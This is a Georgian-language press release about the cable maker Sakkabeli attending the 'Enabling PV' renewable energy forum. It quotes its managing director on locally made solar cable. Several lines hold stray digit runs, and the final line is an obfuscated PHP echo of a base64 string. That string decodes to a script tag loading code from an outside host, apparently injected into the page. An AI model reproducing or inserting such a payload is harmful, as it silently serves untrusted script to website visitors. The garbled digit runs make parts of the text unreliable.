celsiusi
ავერსი საქკაბელი

„საქკაბელმა“ საერთაშორისო განახლებადი ენერგიის ფორუმში “Enabling PV” მიიღო მონაწილეობა. გერმანიის საგარეო საქმეთა ფედერალური სამინისტროს ორგანიზებით, ღონისძიებამ სამხრეთ კავკასიისა და ცენტრალური აზიის რეგიონიდან საჯარო, სამრეწველო, ფინანსური სექტორებისა და საგანმანათლებლო დაწესებულებებიდან 100-ზე მეტი ექსპერტი გააერთიანა.

მზის და სხვა განახლებადი ენერგიების ხელშეწყობის ფარგლებში, ფორუმზე ისეთი საკითხები იყო განხილული, როგორიცაა: ფოტოელექტრული სისტემებისა და პროექტების განვითარების გზები, ენერგოეფექტური სტრატეგიები, კვალიფიციური სამუშაო ძალის მნიშვნელობა და სხვა.

ღონისძიების ფარგლებში, პანელური დისკუსია წარიმართა, სახელწოდებით „ღირებულების შექმნა და ინდუსტრიული განვითარება - განახლებადი ენერგიის კომპონენტები ადგილობრივ წარმოებაში“. დისკუსიის ფარგლებში “საქკაბელის” მმართველმა დირექტორმა, დავით კაპანაძემ, სოლარ (H1Z2Z2-K) კაბელის ადგილობრივად წარმოების მნიშვნელობაზე ისაუბრა და ხაზი გაუსვა აღნიშნულის კონტრიბუციას საქართველოს ენერგოდამოუკიდებლობის გზაზე.  

4 1536x9615555555555555555555555555555555

“როგორც მოგეხსენებათ, მზის ელექტროსადგურების ეფექტიანი მუშაობისათვის ერთ-ერთ მნიშვნელოვან კომპონენტს სოლარ კაბელი წარმოადგენს. აღნიშნულის წარმოება წლის დასაწყისში დავიწყეთ, რომელზე მოთხოვნაც დღითიდღე იზრდება. „საქკაბელის“ მიერ წარმოებულ სოლარ კაბელს გარემო პირობების მიმართ განსაკუთრებული მედეგობა გამოარჩევს, ხოლო მის ერთ-ერთ მნიშვნელოვან უპირატესობას გამოყენებული იტალიური საიზოლაციო მასალა წარმოადგენს, რომელიც ფრინველებისა და მღრღნელებისგან საწინააღმდეგო დანამატს შეიცავს. საბოლოო ჯამში კი, ეს ყველაფერი მზის პანელების ურთიერთკავშირსა და გრძელვადიან ფუნქციონირებას საიმედოდ უზრუნველყოფს.

პროდუქტზე ჩეხეთის “ელექტროტექნიკური ტესტირების ინსტიტუტისა’’ და საერთაშორისო მასერტიფიცირებელი ორგანო “ტუვ ნორდის” მიერ მინიჭებული შესაბამისობის სერტიფიკატები კი გვაძლევს იმის ამაყად თქმის შესაძლებლობას, რომ ადგილობრივი წარმოებით შეგვიძლია არამხოლოდ დავაკმაყოფილოთ საერთაშორისო სტანდარტები, არამედ შევამციროთ იმპორტდამოკიდებულება, დავნერგოთ ინოვაციები და მეტად გავაძლიეროთ ქვეყნის ეკონომიკა.

ღონისძიებები, როგორიცაა “Enabling PV” ფორუმი, იძლევა კარგ შესაძლებლობას, ინდუსტრიის როგორც ადგილობრივმა, ასევე საერთაშორისო წარმომადგენლებმა ერთმანეთს უახლესი ტრენდები და გამოცდილება გავუზიაროთ. სასიხარულოა, რომ „საქკაბელის“ მიერ წარმოებულმა სოლარ კაბელმა სამხრეთ კავკასიისა და ცენტრალური აზიიდან კოლეგების დიდი დაინტერესება დაიმსახურა. დარწმუნებული ვარ, რეგიონული კოლაბორაციითა და გაზიარებული გამოცდილებით კიდევ მეტი შესაძლებლობა მოგვეცემა, ერთად შევუწყოთ ხელი განახლებადი ენერგის ინფრასტრუქტურის განვითარებას” - “საქკაბელის” მმართველი დირექტორი, დავით კაპანაძე.

55555555555555555555555555555555555555555555555555555555

აღსანიშნავია, რომ „Enabling PV“ ფორუმი წელს პირველად ტარდება. ორდღიანმა ღონისძიებამ განახლებადი ენერგიის კუთხით, საქართველოში სამხრეთ კავკასიისა და ცენტრალური აზიიდან სხვადასხვა სფეროს წამყვანი მოთამაშეები გააერთიანა. ფორუმთან დაკავშრებით დამატებითი ინფორმაციისათვის გთხოვთ ეწვიოთ ბმულს: https://enabling-pv.net/forum

355555555555555555555555555555555555555

საქკაბელიადგილობრივ ბაზარზე სფეროს ლიდერის პოზიციას 67- წელია იკავებს და მომხმარებელს, როგორც საკაბელო, ისე ელექტრიფიკაციასთან დაკავშირებულ 2000-მდე დასახელების პროდუქტს სთავაზობს. კომპანიის ერთ-ერთი პრიორიტეტული მიმართულება საექსპორტო ბაზრების დივერსიფიცირება და ქართულ ეკონომიკაში იმპორტის ჩანაცვლებაა. აღსანიშნავია, რომსაქკაბელისპროდუქცია, როგორც ადგილობრივ, ისე საერთაშორისო ბაზარზე, მომხმარებელთან გაგზავნამდე დეტალურ შემოწმებას ქარხანაში მოქმედ, ხარისხის კონტროლის აკრედიტებულ ლაბორატორიაში გადის.

168
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");